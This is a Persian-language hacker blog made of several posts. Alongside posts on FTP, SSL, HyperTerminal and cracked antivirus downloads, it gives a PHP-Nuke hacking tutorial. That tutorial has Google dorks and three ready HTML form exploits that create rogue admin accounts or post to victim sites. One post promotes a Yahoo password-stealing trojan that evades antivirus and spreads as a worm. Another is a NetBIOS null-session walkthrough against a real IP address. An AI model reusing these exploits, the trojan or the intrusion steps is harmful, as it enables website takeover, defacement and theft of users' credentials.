بعد از دو سال آخرش آپدایت کردم! با اینکه هک و هک کردن رو کنار گذاشتم ولی اومدم آپدایت کنیم! قول میدم مطالب هم براتون بزارم ولی نه مثل گذشته! ۲ سال هیت که اپدایت نکردم و میشه گفت تو این دو سال سبک هکر ها کلی فرق کرده! ولی من به نه خیلی حرفه ای و نه خیلی آماتور بالا بردن امنیت سیستم عامل ویندور را با شما کار می کنم.

۱. امروز با یه آدم اسکل چت کردم که یاهو رو هک کرده! lol متن چت اینجاست

۲. یک برنامه برای حذف ویروس جدید یاهو که البته قدیمی شد ولی خیلیا هنوز نوفمن

                    

یکی از قوی ترین و شایعترین ویروس/تروجان هایی که اخیرآ در حال گسترش بین کاربران استفاده کننده از یاهو مسنجر می باشد ویروس "Exploit.JS.ADODB.Stream.e" است. در صورتیکه کامپیوتر شما نیز به این ویروس آلوده شده باشد بدون آنکه متوجه شوید به لیست دوستانتان پیغامهایی مبنی بر بازدید از سایت nsl-school.org ارسال می شود. بدین ترتیب در صورت کلیک بر روی این لینکها دوستان شما نیز آلوده خواهند شد.
هنوز مشخص نیست سازنده این ویروس چه کسی است و این احتمال داده می شود که ویروس مذکور به سرقت اطلاعات و رمز های شخصی افراد می پردازد. در صورتیکه شما و یا یکی از دوستانتان به این ویروس آلوده شده شده اید روش زیر مناسبترین گزینه برای از بین بردن آن است:

پیام و لینک هایی که این ویروس ارسال می کند چیست ؟!
در متن تمامی این پیغام ها لینکی به سایت Nsl-school.org داده شده است که در صورت کلیک کردن بر روی آن کامپیوتر شما آلوده می شود.

در صورتیکه به ویروس آلوده شوید چه مشکلاتی پیش خواهد آمد ؟!
1- در ابتدا ویروس صفحه شخصی اینترنت اکسپلورر (Default IE Page) را به سایت nsl-school.org تغییر می دهد. در این صورت به هیچ طریق امکان عوض کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن یک صفحه وب جدید، ویروس مجددآ خود را در سیستم شما کپی می کند.

2- گزینه های Task Manager و Reg Edit در کامپیوتر غیر فعال می شوند تا شخص نتواند از این طریق فعالیت ویروس را مشاهده و یا از بین ببرد.

3- فایل هایی با نامهای svhost.exe , svhost32.exe , internat.exe در کامپیوتر ایجاد می شوند. (برای اطمینان پوشه های windows و temp را بررسی کنید.)

4- ویروس بدون آنکه متوجه شوید پیغام هایی را به لیست دوستان شما (Yahoo Messenger ID List) ارسال می کند.

چگونه ویروس را از کامپیوتر خود پاک کنیم ؟!
راه ها و روش های مختلفی برای حذف این ویروس معرفی شده است.
ولی روش معرفی شده در اینجا راحت ترین روش است!
فایل زیر را دانلود کنید و سپس فایل YVRemove.bat را از داخل آن اجرا نمائید.

Download 4 KB

password : www.p30download.com

 

2 نوشته شده در  ساعت 20:13  توسط ابليس | 

سلام دوستان

اونایی که به فکر امنیت کامپیوتر خود هستند این پست را مطالعه کنند. امنیت کامپیوتر خود را بالا ببرید و جان این یار خوب را به دست ویرووس ها نسپارید
آنتی ویرووس های جدید آماده ی دریافت شدند : می دونید مه محصولات ۲۰۰۴ همشون تو آرشیو دی ماه باهم جمع شدن! ولی حالا باید محصولات ۲۰۰۶ را جمع کنیم فقط McAfee و Norton در سال ۲۰۰۵ آپدایت شدند ولی امسال همه ی آنتی ویرروس های جهان آپدایت میشنو ما هم به تریتیب می ریم سراغ برترین آنتی ویرروس ها:
می پردازیم به تجزیه و تحلیل McAfee ViruseScan 2.0.21 (راستش ورژن جدید تری هم داست متاسفانه لینکش خراب بود ولی فرق این ۲ ورژن در یک هفته هست)
این آنتی ویرووس ویژگی های منحصر به فردی دارد که از جمله ی آنها :
ـ به صورت خودکار spyware ها و adware ها را شناسايي و تعيين هويت مي کند و آنها را يا بلوکه مي کند و يا آنها را از بين مي برد ، اين نرم افزار توانايي شناختن اين دو جاسوس را در برنامه هايي که به روي سيستم شما نصب شده است و شما از بودن جاسوسها در آن برنامه خبر نداريد را دارد .
ـ به صورت خودکار سيستم شما محافظت مي شود و سيستم شما را از هر خطري که بي مقدمه شما را تهديد مي کند حفظ مي کند .
ـ به صورت خودکار تمامي ويروسها ، کرمها ، تروژان ها ، اکتيو ايکسها و چيزهاي خطرناک ديگر را کشف مي کند و پاک سازي يا از بين مي برد .

در کل اين برنامه بسيار معروف و کارا مي باشد ، اين نرم افزار در بين افرادي که دوست دارند روي سيستم خود يک آنتي ويروس نصب کنند بيشتر به چشم مي خورد تا برنامه هاي ديگر .
از من میشنوید این آنتی ویرووس را جایگزین آنتی ویرووس قبلی کنید و از آن نهایت استفاده رو ببرید !

               

Size : 9,570 KB

Download McAfee ViruseScan 10.0.21 Now + Crack

حالا میریم سراغ آنتی ویرووسی که محبوبیت آن به قدر محبوبیت McAfee هست و استفاده ی زیادی داره و معروف هست : Norton AntiViruse 2006 Beta
در کنار نام این ضد ویرووس مشهور کلمه ی Beta مشاهده می شود که در مورد این کلمه توضیح خاصی نیاز هست! این کالمه با هر برنامه ای بیاد یعنی این نسخه ی آزمایشی برنامه هست و بدین معنا است که این برنامه را به خاطر آرمایش بیرون داده اند و نسخه ی اصلی آن یا Full Version نسخه ای خواهد بود که در آن خطا های ورژن Beta گرفته شده و وقعا آنتی ویرووس خوبی هست!
این آنتی ویرووس از ساخته های شرکت Symantec هست . همونطور که من در توضیح انگیلیش در سایت خودش خوندم این آنتی ویرووس تمام ویرووس ها و کرم ها و اسب های تروا را شناسایی می کند و بدون گرفتن وقت شما آنها را از روی سیستم شما پاکسازی می کند!

                                    
Size : 27,600 KB

Download Norton AntiViruse 2006 + Crack

خوب برای امروز کافیه! تا پس فردا (نسخه های FireWall های مختلف) (دیگر محصولات ۲۰۰۶ Norton ) را برای شما آپدایت می کنم. و به محض پیدا کردنه لینک سالم Kaspersky Prosenal AntiViruse لینکشو میزارم! به همه ی نظرات هم جواب داده میشه تنها خواهش من از شما:

*** تمامی ایرانیان عزیز برای کپی برداری از این مطلب نوشتن نا منبع به صورت فعال واجب هست ممنون از همکاری شما***

2 نوشته شده در  ساعت 0:57  توسط ابليس | 

سلام دوستان
اقدامات جدید امنیتی برای کامپوتر شما از هم اکنون در این وبلاگ برای شما آموزش داده میشود اما این آموزش ها خصوصی هستند و خرج اندکی نیز دارد و سیستم شما نیازی به سیستم اینترنتی DSL دارد این سیستم اتصال به اینترنت با سرعت های فوق العاده هستند.
وگرنه شما باید با ما تماس بگیرید تا برنامه های امنیتی را برای شما از طریق پست ارسال کنیم برای اشتراک در این خدمات فرمی که در منو سمت چپ قسما پایین هست رو پر کنید!

۱-ارسال یکسری برنامه و آموزش منتی (۹۰۰۰)  تومان
۲-ارسال جدید ترین برنامه ها و آموزش تصویری آن (۲۱۰۰۰) تومان!

موفق باشید

2 نوشته شده در  ساعت 3:41  توسط ابليس | 

◊ چطوري يه سرور پيدا کنم که سرويس ftp روي اون فعال باشه؟
اين سوال دو حالت داره:
۱- مي‌خواهيد به صورت anonymous وارد بشين يعني username و password ندارين. براي اين حالت مي‌تونين از خيلي از سايت‌ها استفاده کنيد. مثلا مي‌تونين از ftp.microsoft.com استفاده کنيد يا سايت‌هاي ديگه.
۲- اگه مي‌خوايد به صورت غير anonymous کار کنيد، حيطه عمل‌تون محدود به سايت‌هايي ميشه که username و password واسه اون دارين. مثلا اگه شما سايتي روي اينترنت داشته باشيد ( چه سايت پولي و چه سايت مجاني مثلا در netfirms و geocities و ... ) به شما يک آدرس ftp و يک username و password تعلق مي‌گيره که از طريق اون کار مي‌کنيد. اگه سايت نداريد، مي‌تونيد يک سايت مجاني درست کنيد. مثلا مي‌تونيد از سايت geocities.com که متعلق به ياهو است استفاده کنيد. يا از سايت‌های netfirms.com يا freeservers.com و... ولي به‌هر حال در يکي از اين‌ها ثبت‌نام کنيد و username و password بگيريد. آدرس‌هاي ftp آنها هم که به‌صورت ftp.geocities.com يا ftp.netfirms.com و... خواهد بود. (از من نخواين که طريقه ثبت‌نام در اين سايت‌ها رو هم به شما ياد بدم! کار خيلي راحتيه.)


◊ با پورت ۲۱ صحبت کنيم
فرض کنيد من از يک سايت فرضي استفاده مي‌کنم که آدرس ftp اون باشه: ftp.somesite.com و username من باشه ali1000 و پسوردم هم يه چيزه ديگه باشه. حالا مي‌خوام از طريق پورت ۲۱ با اين سايت ارتباط برقرار کنم. در مورد اين پورت ديگه از nc و telnet استفاده نمي‌کنم، بلکه از برنامه‌اي که در تمام ويندوز‌ها هست، به اسم ftp کمک مي‌گيرم. در command prompt مي‌نويسم:
ftp ftp.somesite.com
و جواب مي‌شنوم:
Connected to somesite.com.
220 somesite Microsoft FTP Service (Version 5.0).
User (somesite.com:(none)):
دقت کنيد که اين سايت ftp server اش از نوع Microsoft است، پس اين سرور از سيستم‌عامل ويندوز استفاده مي‌کنه ( دونستن اين نکات لازم نيست، ولي من توصيه مي‌کنم که هميشه به جزئيات توجه کنيد) دقت کنيد که از من username رو مي‌خواد، پس مي‌نويسم: ali1000 و Enter رو فشار مي‌دم. جواب مي‌آد:
331 Password required for ali1000.
Password:
حالا ازم پسورد مي‌خواد و پسورد رو تايپ مي‌کنم. جواب مي‌شنوم:
230 User ali1000 logged in.
ftp>
اين نشون ميده که تونستم با پورت ۲۱ کامپيوتر مقابل ارتباط برقرار کرده و اصطلاحا يک session يا نشست! باهاش داشته باشم. اگه username يا password اشتباه بود، اون موقع مي‌گفت:
530 User ali1000 cannot log in.
Login failed.
ftp>
من فرض مي‌کنم که session با موفقيت برقرار شده، حالا تايپ مي‌کنم:
ftp> help
و جواب مي‌شنوم:
Commands may be abbreviated. Commands are:

! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
اين‌ها ليست دستوراتي است که مي‌تونيد استفاده کنيد. من فقط اون‌هايي که به صورت bold مشخص کردم رو توضيح خواهم داد. بقيه دستورات کمتر به کار مي‌رن.

بازم ادامه داره

2 نوشته شده در  ساعت 3:2  توسط ابليس | 

◊ پورت ۲۱ چيست؟
پورت ۲۱ رو پورت ftp مي‌گن. ftp مخفف عبارت file transfer protocol است يعني پروتکل انتقال فايل. کاربرد اين پروتکل و اين پورت از زماني وجود داره که حتي وب (پورت ۸۰ ) هم چندان عمومي نشده بود. پس مي‌تونم بگم که يه پروتکل باستاني هستش. وقتي مي‌خواهيد با يک سرور از طريق اين پروتکل صحبت کنيد، بايد مطمئن بشين که سرويس مربوط به ftp روي اون کامپيوتر فعال باشه. به عبارت ديگه بايد يک ftp server روي اون کامپيوتر در حال اجرا باشه. حالا شما با اون کامپيوتر مي‌خواين ارتباط برقرار کنين، پس شما بايد از يک ftp client استفاده کنيد. پس شما کلاينت هستيد و دستگاه مقابل سرور!
حالا شايد بپرسين که کار ftp چيست؟
ftp براي انتقال فايل به کار ميره و اين انتقال فايل در دو جهت ممکنه که upload و download گفته ميشه. براي اينکه اين‌ها رو قاطي نکنيد با هم فرض کنيد که کامپيوتر سرور بالای سر شما قرار گرفته، پس وقتي فايل رو از اون مي‌گيريد، فايل به سمت پايين مي‌آد (download) و وقتي فايل رو براي سرور مي‌فرستيد، حالت برعکس مي‌باشد و بهش مي‌گيم، upload کردن. و هر دو عبارت نوعي انتقال فايل محسوب ميشه. دقت کنيد که انتقال فايل از طريق پروتکل‌هاي ديگه‌اي هم امکان‌پذيره مثل web و ... ولي ما بحث‌مون همين پروتکل ftp است.
عبارت ديگه‌اي که راجع به اين پورت بايد ياد بگيريد، عبارت anonymous است. براي توضيح اين عبارت اول بايد بگم که وقتي شما مي‌خواهيد با سرور ارتباط برقرار کنيد، همين‌طوري کشکي که نيس! براي ارتباط با سرور از شما username و password پرسيده مي‌شه و اگه درست باشه مي‌تونين فايل‌ها رو upload و download کنيد و تغيير بديد ( پس مي‌بينيد که اين پروتکل پروتکل حساسي است و اگه هک بشه خيلي کارها ميشه باهاش کرد). اين حالت که گفتم در حالتي ممکنه که شما username و password داشته باشيد. اما گاهي پيش مي‌آد که username و password نداريم و مي‌خوايم با پورت ftp يک سرور يا سايت ارتباط برقرار کنيم. در اين حالت معمولا فقط اجازه download به ما داده ميشه و اجازه upload و يا اعمال تغييرات در فايل‌ها رو نداريم و اونو حالت anonymous يا ناشناس مي‌گن. در اين حالت وقتي از ما username خواسته ميشه، عبارت anonymous را تايپ مي‌کنيم و بعد که پسورد پرسيده ميشه، شما بايد E-mail تون رو وارد کنيد، ولي من مي‌گم که به جاي E-mail واقعي تون يه E-mail الکي بنويسين مثلا alaki@dolaki.com !!
آدرسي که براي ftp با يه سرور استفاده مي‌کنيم به چه شکلي است؟
آدرسي که استفاده مي‌کنيم بستگي به سرور داره ولي معمولا ساختار ثابتي داره. ( اگه يادتون باشه واسه web مثلا مي‌نوشتيم، www.far30.com ) حالا براي ftp مي‌نويسيم، ftp.far30.com پس مثلا براي سايت sazin.com مي‌نويسيم، ftp.sazin.com که آدرس ftp سايت ميشه.

ادامه دارد...

2 نوشته شده در  ساعت 2:32  توسط ابليس | 

2 نوشته شده در  ساعت 16:23  توسط ابليس | 

سلام دوستان
اول از همه حجم ها رو برای شما توضیح میدم. به ترتیب
بیت
۸ بیت = ۱ بایت
۱۰۲۴ بایت = ۱ کیلو بایت KB
1024 کیلو بایت = ۱ مگابایت MG
۱۰۲۴ مگا بایت = ۱ گیگا بایت GB
۱.۲۴ مگا بایت = ۱ ترابایت TB

حالا ایمیل یاهو را بررسی می کنیم که حجمی که برای Inbox می دهد ۱ GB یا 1024 MB هست که حجمی هنگفت و زیاد محسوب می شود! و سرور جیمایل هم که ۲ GB می دهد!
حالا کسی ایمیل ۱ TB میخواد؟

هر کی ایمیل ۱ TB می خواد اینجا کلیک کنه

***کپی برداری به ذکر منبع به صورت www.eblis-empire.tk مجاز می باشد و در غیر اینصورت پیگرد غیر قانونی دارد***

2 نوشته شده در  ساعت 19:35  توسط ابليس | 

بچه ها سلام .

يه سورپرايز خيلی گنده :‌

Toxic-ps 2.0 

قیمت : مجانی
نویسنده : www.mytoxic.tk
لینک داونلود :  http://home.ripway.com/2004-11/206098/Toxic-Ps2.0.zip
توضیح :
Toxic-ps 2.0  یه پسورد سندر که رمز یاهو رو می فرسته . شناسایی این پسورد سندر بسیار سخت و در عین حاال بازده اون بسیار بالاست.  
این پسورد سندر که در نوع خودش منحصر بفرد هست فابلیت های زیادی رو داره :
1-فرستادن پسورد  به 3 صورت مختلف : الف - به ID شخص می فرسته .  ب-به Email شخص می فرسته   ج-از روش ارسال به یک صفحه ی Asp  پسورد رو می فرسته

2-رد شدن از فایروال.

3- فابلیت غیر فعال کردن فایروال و آنتی ویروس .

4- عدم شناخته شدن توسط آنتی ویروس.

5-حجم بسیار کم (13 کیلو بایت ) .

6-فرستادن پسورد بدون تغییر توپی .

7-فرستادن پسورد به روش OnTime طوری که بعد از اینکه ویروس تو کامپیوتر هدف اجرا شد اگه یاهومسنجر آنلاین باشه بلافاصله پسورد و آی دی رو می فرسته .

8-ارسال یوزرنیم ویندوز.

9-مخفی موندن در TaskManager .

10- استارت آپ مخفی در Msconfig

11-غیر فعال فعال کردن Msconfig  به این گزینه احتیاجی نیست .

12- غیر فعال کردن Registry 

13-غیر فعال کردن Save Password در یاهو مسنجر .

14-مخفی ماندن در آرشیو شخص هک شده .

15-پیغام خطای قلابی .

16-امکان انتخاب آیکون فایل .

17-کارکرد سرور با پسوندهای  exe,bat,scr,pif,cmd

18-امکان تبدیل شدن به یک Worm که خودش رو در فلاپی ها کپی می کنه . از این ویژگی که یکی از جالبترین فابلیت ها این پسورد سندر هست می شه تو تایپ و تکثیری ها استفاده کرد .

2 نوشته شده در  ساعت 0:17  توسط ابليس | 

آموزش هك سايتهای Php Nuke 

سلام خدمت تمامی دوستان خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...

به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..

من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads

این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads

برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads

اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php

اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.

خوب تالا ما فرض میکنیم که admin.php وجود داره.

من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.

شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.

بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.

کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.

كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>

کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>

خوب اینم از آموزش هک کردن سایتهای popnuke از این روش

امیدوارم به کارتون بخوره

اگه کسی روش دیگه ای بلد هست اینجا بگه ممون

راستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه

به googel برید و عبارت Farsi project by PHP-Nuke را بنویسید .

منبع: www.demonteam.net

2 نوشته شده در  ساعت 3:24  توسط ابليس | 

معرفی:
Hyper terminal از برنامه های بسیار قوی ویندوز برای انتقال اطلاعات می باشد با این برنامه می توان بدون اتصال به اینترنت برای دیگران فایل بفرستید و یا برای آنها پیام بگذارید .
طرز کار :
· این برنامه را ویندوز به صورت پیش فرض دارد و شما می توانید با رفتن به منوی start سپس All programs و بعد از آن به زیر شاخه accessories سپس communication را انتخاب کرده و در آخر Hyper terminal را اجرا کنید .

· وقتی برنامه را اجرا کردید صفحه ای ظاهر می شود که در آن باید برای ارتباط خود اسم بگذارید و سپس روی OK کلیک کنید.

· سپس در صفحه باز شده باید شماره تلفن مورد نظر را وارد کنید.

· بعد از وارد کردن شماره تلفن در صفحه بعد باید روی دکمه dial کلیک کنید . بعد از اینکه ارتباط برقرار شد صفحه ای باز می شود که در آن امکانات متفاوتی وجود دارد از جمله دو دکمه است که شما با یکی از آنها می توانید محل فایلی را که می خواهید بفرستید مشخص کنید و برایش بفرستید و دکمه دیگر برای گرفتن فایل است که محل ریخته شدن فایل را مشخص می کند.

توجه: در کامپیوتری که شما به آن می خواهید متصل شوید باید فرد قبلا آنرا در حالت wait for call قرار دهد . برای این منظور فرد باید وارد منوی call شود و روی wait for call کلیک کند .

Hyper terminal از برنامه هاي خوده ويندوزه لينك نمي خواد ... مسيرشم اينه :
\Start Menu\Programs\Accessories\Communications\HyperTerminal

2 نوشته شده در  ساعت 3:22  توسط ابليس | 

پيچيده گيهای يک پروتکل SSL برای کاربران شما پوشيده است ليکن مرورگر اينترنت آنها در صورت برقراری ارتباط امن , وجود اين ارتباط را توسط نمايش يک قفل کوچک در پايين صفحه متذکر ميشود.

و در هنگامي كه شما روي قفل كوچك زرد رنگي كه در پايين صفحه IE نمايش داده ميشود دوبار كليك ميكنيد باعث نمايش گواهينامه شما به همراه ساير جزئيات مي شود.

گواهينامه های SSL تنها برای شرکتها و اشخاص حقيقی معتبر صادر ميشوند. به طور مثال يک گواهينامه SSL شامل اطلاعاتی در مورد دامين , شرکت , آدرس , شهر , استان , کشور و تاريخ ابطال گواهينامه و همينطور اطلاعاتی در مورد مرکز صدور گواهينامه که مسؤول صدور گواهينامه ميباشد.

زمانيکه يک مرورگر اينترنت به يک سايت از طريق ارتباط امن متصل ميشود , علاوه بر دريافت گواهينامه SSL ( کليد عمومي) , پارامترهايی را نظير تاريخ ابطال گواهينامه , معتبر بودن صادرکننده گواهينامه و مجاز بودن سايت به استفاده از اين گواهينامه نيز بررسی ميکند و هرکدام از موارد که مورد تاييد نباشد به صورت يک پيغام اخطار به کاربر اعلام ميدارد.

براي ثبت يك امضاي الكترونيكي رايگان به سايت زير مراجعه كنيد : iranssl.com

منبع : www.kamyar-hacker.tk

2 نوشته شده در  ساعت 0:19  توسط ابليس | 

Secure Socket Layer , يا همان SSL يک تکنولوژی استاندارد و به ثبت رسيده برای تامين ارتباطی امن مابين يک وب سرور و يک مرورگر اينترنت است. اين ارتباط امن از تمامی اطلاعاتی که ما بين وب سرور و مرورگر اينترنت ( کاربر) انتقال ميابد , محافظت ميکند تا در اين انتقال به صورت محرمانه و دست نخورده باقی بماند. SSL يک استاندارد صنعتی است و توسط مليونها وب سايت در سراسر جهان برای برقراری امنتيت انتقال اطلاعات استفاده ميشود. برای اينکه يک وب سايت بتواند ارتباطی امن از نوع SSL را داشته باشد نياز به يک گواهينامه SSL دارد.

زمانيکه شما ميخواهيد SSL را بر روی سرور خود فعال کنيد سؤالات متعددی در مورد هويت سايت شما ( مانند آدرس سايت ) و همين طور هويت شرکت شما ( مانند نام شرکت و محل آن) از شما پرسيده ميشود. آنگاه سرور دو کليد رمز را برای شما توليد ميکند , يک کليد خصوصی (Private Key) و يک کليد عمومی (Public Key). کليد خصوصی به اين خاطر , اين نام را گرفته است , چون بايستی کاملا محرمانه و دور از دسترس ديگران قرارگيرد. اما در مقابل نيازی به حفاظت از کليد عمومی نيست و اين کليد در قالب يک فايل درخواست گواهينامه يا Certificate Signing Request که به اختصار آنرا CSR ميناميم قرارداده ميشود که حاوی مشخصات سرور و شرکت شما بصورت رمز است. آنگاه شما باسيتی که اين کد CSR را برای صادرکننده گواهينامه ارسال کنيد. در طول مراحل سفارش يک SSL  مرکز صدور گواهينامه درستی اطلاعات وارد شده توسط شما را بررسی و تاييد ميکند و سپس يک گواهينامه SSL برای شما توليد کرده و ارسال ميکند.

وب سرور شما گواهينامه SSL صادر شده را با کليد خصوصيتان در سرور و بدور از دسترس سايرين مطابقت ميدهد. سرور شما آنگاه امکان برقراری ارتباط امن را با کاربران خود در هر نقطه دارد.

                              منبع: www.kamyar-hacker.tk

2 نوشته شده در  ساعت 1:52  توسط ابليس | 

دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد

System error 5 has occurred.

Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:

net use \\217.218.84.29\IPC$ "" /user:""
حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

Shared resources at \\217.218.84.29

Share name Type Used as Comment

------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

?- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم:

net use L: \\217.218.84.29\SharedDocs
به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم:

The command completed successfully.
معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

?- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور

net use /delete L:
استفاده کنيد.
? نکته نکته نکته

?- يه روش جالب به جاي مرحله ? در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29\\ که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت\217.218.84.29\\ که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ).
?- من دارم به صورت استاندارد کار مي‌کنم. بعدا خواهم گفت که چطوري مي‌تونيم وقتي تو بعضي از مراحل متوقف مي‌شيم، اونو دور بزنيم.
?- NetBIOS فقط براي کلاينت‌ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
?- اگه داريد يک کلاينت رو هک مي‌کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
?- روش‌هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش‌ها استفاده از يک سري نرم‌افزارهاي خاص است که تو درس بعدي توضيح مي‌دم و نيز يک روش ديگه اعمال تغييرات در فايل‌هاي HOST و LMHOST و استفاده از find در سيستم‌عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
?- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيش‌فرض در کامپيوتر فعال است، معمولا مشکلي نيست.

2 نوشته شده در  ساعت 1:42  توسط ابليس | 

? چگونه با پورت ??? صحبت کنيم؟

?- اولين کاري که مي‌کنيم اين است که براي پورت ??? پورت اسکن مي‌کنيم تا ip هايي را که پورت ??? در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
اين خروجي اعلام مي‌کند که پورت ??? باز است. پس مي‌شود از اين ip استفاده کرد.

?- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ??? روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:

nbtstat -A 217.218.84.29
